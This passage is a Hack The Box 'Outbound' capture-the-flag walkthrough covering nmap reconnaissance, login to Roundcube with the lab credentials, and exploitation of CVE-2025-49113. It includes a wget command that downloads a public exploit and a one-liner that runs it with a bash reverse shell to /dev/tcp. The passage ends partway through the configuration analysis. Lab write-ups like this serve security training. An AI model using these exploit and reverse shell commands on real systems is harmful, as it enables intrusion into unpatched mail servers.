HTB Outbound - Complete Walkthrough

Machine Information

Reconnaissance

Port Scanning

nmap -sV -sC -v 10.x.x.x

Results:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-12 14:46 CDT
Nmap scan report for mail.outbound.htb (10.x.x.x)
Host is up (0.012s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
|_http-server-header: nginx/1.24.0 (Ubuntu)

Service Analysis

• SSH (Port 22): OpenSSH 9.6p1 Ubuntu
• HTTP (Port 80): nginx 1.24.0 serving Roundcube webmail The web application is identified as Roundcube Webmail accessible at http://mail.outbound.htb/.

Initial Access

Roundcube Authentication

Using the provided credentials:

• Username: tyler
• Password: LhKL1o9Nm3X2 Successfully authenticated to the Roundcube webmail interface.

Vulnerability Identification

After logging in and examining the application, identified that this Roundcube version is vulnerable to CVE-2025-49113 - a remote code execution vulnerability.

CVE-2025-49113 Exploitation

1. Download the exploit:

wget https://raw.githubusercontent.com/hakaioffsec/CVE-2025-49113-exploit/refs/heads/main/CVE-2025-49113.php

2. Execute the exploit for reverse shell:

php exploit.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 "bash -c 'bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1'"

3. Caught reverse shell as www-data 4. Switch to tyler user:

su tyler
# Password: LhKL1o9Nm3X2

Information Gathering

Roundcube Configuration Analysis

Located and examined the Roundcube configuration file: File: /var/www/html/roundcube/config/config.inc.php Key findings: